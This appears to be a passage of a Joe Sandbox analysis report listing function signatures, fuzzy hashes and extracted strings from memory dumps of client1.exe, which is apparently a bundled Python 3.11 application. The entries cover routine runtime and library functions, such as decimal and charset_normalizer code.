                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc
                                                    • String ID:
                                                    • API String ID: 3617616757-0
                                                    • Opcode ID: 75f5ee3f9e2dee92d5d6860bc62137785b445111f4c46999c23ff5ea1904ff93
                                                    • Instruction ID: 1c80b33a86ec34ba30d4941e3a4c6ee47a358988144f96936123bb9ab5bbdb94
                                                    • Opcode Fuzzy Hash: 75f5ee3f9e2dee92d5d6860bc62137785b445111f4c46999c23ff5ea1904ff93
                                                    • Instruction Fuzzy Hash: E511E9B2D5660141EB7A8F7AD99833C22A4AF54B79F298324CE79015F0CF6D94858384
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFloat_From$Complex_DoubleDoublesString
                                                    • String ID:
                                                    • API String ID: 2261090102-0
                                                    • Opcode ID: b245bd889db09b2cff993a6b15c25dea8df691e9df1608beecb7f61bf70a380a
                                                    • Instruction ID: f339bac1976b647e8565bf38270ba10a81fe053f9919accdaed01b84cd44eaaa
                                                    • Opcode Fuzzy Hash: b245bd889db09b2cff993a6b15c25dea8df691e9df1608beecb7f61bf70a380a
                                                    • Instruction Fuzzy Hash: BCF03190E1B946C1FA175F3CE8260BF56E87F24B49F0862B5DE4E152B0DE1D745B4A20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    • Opcode ID: 634ba5f77c378312b060cfb67b3957d80d32da840b00503f8fcfb152740ba25c
                                                    • Instruction ID: 576d74c8388717671ddef3ba19ae9eb0ffdaffd61bbefa90f064f2cdfa60f243
                                                    • Opcode Fuzzy Hash: 634ba5f77c378312b060cfb67b3957d80d32da840b00503f8fcfb152740ba25c
                                                    • Instruction Fuzzy Hash: BB61B2B2A19781C9E7118F74E8103EE7BA4FB85798F105176EE8D16A99DF3CD146CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                    • String ID: ?
                                                    • API String ID: 1286766494-1684325040
                                                    • Opcode ID: 8b5d587ec6f6b7eed71ba39116b338de031c50ce5c8dd23bba2b14458f06a6e4
                                                    • Instruction ID: 3225b170cf9919eee0b2f84586cb995d08a99e14da07d48812648177800a96ba
                                                    • Opcode Fuzzy Hash: 8b5d587ec6f6b7eed71ba39116b338de031c50ce5c8dd23bba2b14458f06a6e4
                                                    • Instruction Fuzzy Hash: 4D41D613A087C255FB74BB3594023FAA6AAEF81BA4FA44235EF6C07AD5DE3CD4518710
                                                    APIs
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F637E9E
                                                      • Part of subcall function 00007FF79F639E18: HeapFree.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF79F62B105), ref: 00007FF79F637EBC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                    • String ID: C:\Users\user\Desktop\client1.exe
                                                    • API String ID: 3580290477-3981961939
                                                    • Opcode ID: 7be78eb059dea3495cc358456d23a898a8a026444ba3d0a56d0d7994263981b4
                                                    • Instruction ID: c7243760c77a5a2ba2524ef3bb143f7c618380d230a22ee2f67c0ac2cee44451
                                                    • Opcode Fuzzy Hash: 7be78eb059dea3495cc358456d23a898a8a026444ba3d0a56d0d7994263981b4
                                                    • Instruction Fuzzy Hash: 27415F32A08B9285EB24FF35D4800F8A7AAFF45794BD44039E96E43B85EF7DE4418760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Object_Unicode_
                                                    • String ID: gfffffff
                                                    • API String ID: 3285369508-1523873471
                                                    • Opcode ID: ce2dc6916272c2e0652045ec39cde27bf4333cc68ed97e979b7b9284f6183f32
                                                    • Instruction ID: ad0e9822dc9301a0fcfb558ef0ac7fd13e925175d118ac94d329a76ee3eed51c
                                                    • Opcode Fuzzy Hash: ce2dc6916272c2e0652045ec39cde27bf4333cc68ed97e979b7b9284f6183f32
                                                    • Instruction Fuzzy Hash: 304178A2B0D78182FB118B27E0613BD6B90EB50BE0F049134DE6E4B7A1DE3CE542C781
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_Err_FormatFreeMem_ParseTuple
                                                    • String ID: conversion from %s to Decimal is not supported
                                                    • API String ID: 2425325164-3964344595
                                                    • Opcode ID: 1930848f69a8dd755326391be5c3c490d0ca58362c088830b15d41570eaf804c
                                                    • Instruction ID: 54eb68a76b8c531bb8ab78cbeb2ecf67b6c2644fbbc82bb03064e08a55091e0c
                                                    • Opcode Fuzzy Hash: 1930848f69a8dd755326391be5c3c490d0ca58362c088830b15d41570eaf804c
                                                    • Instruction Fuzzy Hash: C741A3D0A0E643E0FA169F36D66457B9B9AAF44FC0F1060B6CD0D67B96DE6CE4438321
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                    • Instruction ID: d8288a821d60d807d24e101a889977289f27ecd64d153d6bd9ca5533d84db7b9
                                                    • Opcode Fuzzy Hash: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                    • Instruction Fuzzy Hash: 6941BF22A18B8186EB30AF65E8443E9B7AAFB88794F804131EE5D87798DF7CD441C750
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    • Opcode ID: f22c52d47cb846a99d8516e9592497de04618e9629921033cbc4078d7013c5f0
                                                    • Instruction ID: 37fc3ae25e8115673c7bbc5a6a23ea9830848b53a9daa0cc5fd778de02d78427
                                                    • Opcode Fuzzy Hash: f22c52d47cb846a99d8516e9592497de04618e9629921033cbc4078d7013c5f0
                                                    • Instruction Fuzzy Hash: DF3191B3A19BC5CAE7128F35E8513AEA764F789784F005125EECD12A59DF7CD186CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: 89ffee479c464830a404f371819462673addff3e4a0adbddceaf6599ad198d2e
                                                    • Instruction ID: a1c1ac3e35cef5dca5b2dffa328874262bdb24a07ee44c6fa033a46e3c123853
                                                    • Opcode Fuzzy Hash: 89ffee479c464830a404f371819462673addff3e4a0adbddceaf6599ad198d2e
                                                    • Instruction Fuzzy Hash: CC21E362A087C281EB30AB21D4542ADB3BBFB94B84FC54035C6AC43284DFBDE5498771
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    • Opcode ID: d571f0cc72055e077ceb28729aec96d86d77c2e813d1e087a2f476782c23c19f
                                                    • Instruction ID: 61a63859e4cbb3b7fa3bf7d2af84b68eb41bfe5a7c2d48ba76c2dbfba58c52a3
                                                    • Opcode Fuzzy Hash: d571f0cc72055e077ceb28729aec96d86d77c2e813d1e087a2f476782c23c19f
                                                    • Instruction Fuzzy Hash: 8E219FB2A197818AE7128F35E8113EE6764FB89B88F501175EE8D17B59DF3CD14ACB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Error detected
                                                    • API String ID: 1878133881-3513342764
                                                    • Opcode ID: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                    • Instruction ID: 05cd645ff5f888422db5e4e7115e06dcb47c015c2c7129efa72a60483e0df11d
                                                    • Opcode Fuzzy Hash: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                    • Instruction Fuzzy Hash: 792153726287C291FA30AB20F4517EAA359FB84788FC05135EA9D47A95DF3CD205C751
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Fatal error detected
                                                    • API String ID: 1878133881-4025702859
                                                    • Opcode ID: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                    • Instruction ID: 79b571e26da2bfd48c070471a7e58d0411b39622869149dfb16ba3604a0de879
                                                    • Opcode Fuzzy Hash: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                    • Instruction Fuzzy Hash: 3C21B5726287C291EB30BB20F8517EAA359FB84788FC00135E69D47A95DF3CD205C751
                                                    APIs
                                                    Strings
                                                    • valid values for rounding are: [ROUND_CEILING, ROUND_FLOOR, ROUND_UP, ROUND_DOWN, ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN, ROUND_05UP], xrefs: 00007FFBAA709992
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: CompareErr_StringUnicode_
                                                    • String ID: valid values for rounding are: [ROUND_CEILING, ROUND_FLOOR, ROUND_UP, ROUND_DOWN, ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN, ROUND_05UP]
                                                    • API String ID: 643742939-1015891402
                                                    • Opcode ID: 3a85d9e1c53251d2d086d4e1452605908b77564e48832262553d256ca4bda505
                                                    • Instruction ID: 56a934146c796bd700d179f01e826c3b81d6acb2e8e6affdcfcc0365bd522fea
                                                    • Opcode Fuzzy Hash: 3a85d9e1c53251d2d086d4e1452605908b77564e48832262553d256ca4bda505
                                                    • Instruction Fuzzy Hash: 8E1173A1B1AA42D1E611CF25E84006B7768FBC4B91F184171DD8E53768CF3ED847C750
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                    • Instruction ID: 9d94cc3acb5f3c85cba13d30bb3129c537d7161fd2bf0c3510a608b2a8661950
                                                    • Opcode Fuzzy Hash: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                    • Instruction Fuzzy Hash: 6B115432618B8182EB219F25F5402D9B7A9FB88B94F584234EF9C47754DF3DD551C710
                                                    APIs
                                                    • PyType_IsSubtype.PYTHON311 ref: 00007FFBAB49893B
                                                      • Part of subcall function 00007FFBAB4936A0: PyErr_Format.PYTHON311 ref: 00007FFBAB4936D4
                                                      • Part of subcall function 00007FFBAB493710: PyThreadState_Get.PYTHON311 ref: 00007FFBAB493732
                                                      • Part of subcall function 00007FFBAB493710: PyErr_Fetch.PYTHON311 ref: 00007FFBAB49374A
                                                      • Part of subcall function 00007FFBAB493710: PyCode_NewEmpty.PYTHON311 ref: 00007FFBAB49375D
                                                      • Part of subcall function 00007FFBAB493710: PyFrame_New.PYTHON311 ref: 00007FFBAB493777
                                                      • Part of subcall function 00007FFBAB493710: _Py_Dealloc.PYTHON311 ref: 00007FFBAB49378E
                                                      • Part of subcall function 00007FFBAB493710: _PyErr_ChainExceptions.PYTHON311 ref: 00007FFBAB4937A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: Err_$ChainCode_DeallocEmptyExceptionsFetchFormatFrame_State_SubtypeThreadType_
                                                    • String ID: charset_normalizer.md.MessDetectorPlugin$reset
                                                    • API String ID: 1820948682-4122180197
                                                    • Opcode ID: e74373900b7c84a88a11a969e50a50432fe1c9e43874778d362feb55dab9bba0
                                                    • Instruction ID: 92d8e7da7829a3601ac525494456d94064c5d82c08aced0b4ef5afe837435fb7
                                                    • Opcode Fuzzy Hash: e74373900b7c84a88a11a969e50a50432fe1c9e43874778d362feb55dab9bba0
                                                    • Instruction Fuzzy Hash: 7D014BE0F4A50780FE569BBBE8811B917A5AF59BC0F44C436DC3D8B3B2DE2CE5918211
                                                    APIs
                                                      • Part of subcall function 00007FFBAA706EB8: PyTuple_Size.PYTHON311 ref: 00007FFBAA706EEC
                                                      • Part of subcall function 00007FFBAA706EB8: PyLong_AsLong.PYTHON311 ref: 00007FFBAA706F17
                                                      • Part of subcall function 00007FFBAA706EB8: PyLong_AsSsize_t.PYTHON311 ref: 00007FFBAA706F68
                                                      • Part of subcall function 00007FFBAA706EB8: PyTuple_Size.PYTHON311 ref: 00007FFBAA706FA8
                                                      • Part of subcall function 00007FFBAA706EB8: PyMem_Malloc.PYTHON311 ref: 00007FFBAA706FB8
                                                      • Part of subcall function 00007FFBAA706EB8: PyLong_AsLong.PYTHON311 ref: 00007FFBAA707022
                                                    • PyMem_Free.PYTHON311(?,?,?,00007FFBAA706795), ref: 00007FFBAA706CE6
                                                    • _Py_Dealloc.PYTHON311(?,?,?,00007FFBAA706795), ref: 00007FFBAA706D06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Long_$LongMem_SizeTuple_$DeallocFreeMallocSsize_t
                                                    • String ID: argument must be a tuple or list
                                                    • API String ID: 687260090-986076822
                                                    • Opcode ID: 684bd140da40fb6bb725d4fb9f439ad82f2867d5e4afc151041550d49d268306
                                                    • Instruction ID: ed53cd0ccb7678d2e731ae328038f0637fea2eddf22247db992215736e14586e
                                                    • Opcode Fuzzy Hash: 684bd140da40fb6bb725d4fb9f439ad82f2867d5e4afc151041550d49d268306
                                                    • Instruction Fuzzy Hash: 6201A7A1B0AB42D0EE069F32E52447BA6A9EF04FC0F0840B5DD1D17765DE7CE4438320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                    • String ID: :
                                                    • API String ID: 2595371189-336475711
                                                    • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                    • Instruction ID: f6a196918b46ec67a83ca2aae2117e4ea2a4506a7808c67bb6a2d9dc34037f39
                                                    • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                    • Instruction Fuzzy Hash: 2601D42292C38286FB35BF74A8612FEA3A9EF44708FC41135D56C82285DF6CE544DA24
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Similarity
                                                    • API ID: String$Err_FromUnicode_
                                                    • String ID: no such name
                                                    • API String ID: 3678473424-4211486178
                                                    • Opcode ID: 0bad81046192c5090e63041fc1c0adfcc3ec090d4373e4d8dfd61f48ff6f657e
                                                    • Instruction ID: 8d0078e0cee045c82fe73d151d714c72f7907bfd586309b7d08ac67750d6ddc2
                                                    • Opcode Fuzzy Hash: 0bad81046192c5090e63041fc1c0adfcc3ec090d4373e4d8dfd61f48ff6f657e
                                                    • Instruction Fuzzy Hash: 080181B1B1AA46D6FA62AF31E8543B72368FF98B45F4100B1DF4E46754DF2CE1068630
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Object_$AttrDeallocString
                                                    • String ID: numerator
                                                    • API String ID: 1614008757-727639709
                                                    • Opcode ID: 664a8b7548da97a9f2b5951361a89b3c0fefd4217b97b667dadd7fb88e5588c0
                                                    • Instruction ID: 15594ea9c9f416fb4eb74f0bc11d1892bd108271b5d897f5c12926ef9892e346
                                                    • Opcode Fuzzy Hash: 664a8b7548da97a9f2b5951361a89b3c0fefd4217b97b667dadd7fb88e5588c0
                                                    • Instruction Fuzzy Hash: 87F082D1A0F742D0EE169F36E9540BAAADD9F48FD0B1C5071CD1D067A5DD2CE1878320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_is_current_word_bad' cannot be deleted$bool
                                                    • API String ID: 1450464846-604167972
                                                    • Opcode ID: 4c20456b68d317d2c4cbca0898148b87029a092011c9c4153aace44cb894d61d
                                                    • Instruction ID: fb2a361444706ce6de67299202a3caa9d883ae6db792dfcc49ee55cf593815a3
                                                    • Opcode Fuzzy Hash: 4c20456b68d317d2c4cbca0898148b87029a092011c9c4153aace44cb894d61d
                                                    • Instruction Fuzzy Hash: 3AF0FEF5F1B90695EE06DB3AD9950382660BB94764F94C635DD3C462F0EF2CD55A8300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_watch' cannot be deleted$bool
                                                    • API String ID: 1450464846-232606992
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_buf' cannot be deleted$bool
                                                    • API String ID: 1450464846-2595685569
                                                    APIs
                                                    • _PyObject_GC_New.PYTHON311(?,?,00000000,00007FFBAA732533), ref: 00007FFBAA7325B6
                                                    • PyObject_GC_Track.PYTHON311(?,?,00000000,00007FFBAA732533), ref: 00007FFBAA7325E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Similarity
                                                    • API ID: Object_$Track
                                                    • String ID: 3.2.0
                                                    • API String ID: 16854473-1786766648